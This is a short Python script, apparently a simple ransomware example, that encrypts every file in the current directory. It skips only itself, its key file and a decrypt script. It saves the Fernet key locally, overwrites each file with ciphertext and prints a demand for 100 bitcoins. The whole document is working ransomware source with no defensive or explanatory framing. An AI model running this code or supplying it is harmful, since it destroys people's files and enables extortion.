#!/usr/bin/env python3
# Let's find some files

import os
from cryptography.fernet import Fernet

files = []

# List all files in the current directory
for file in os.listdir():
    if file == "ransomware_encrypt.py" or file == "thekey.key" or file == "ransomware_decrypt.py":
        continue
    if os.path.isfile(file):
        files.append(file)

print(files)

# Generate a key
key = Fernet.generate_key()

# Save the key to a file
with open("thekey.key", "wb") as thekey:
    thekey.write(key)

# Encrypt the files
for file in files:
    with open(file, "rb") as thefile:
        contents = thefile.read()  # Read the contents of the file
    content_encrypted = Fernet(key).encrypt(contents)  # Encrypt the contents
    with open(file, "wb") as thefile:
        thefile.write(content_encrypted)  # Write the encrypted content to the file

print("All files got encrypted , send me 100 bitcoins !!") 
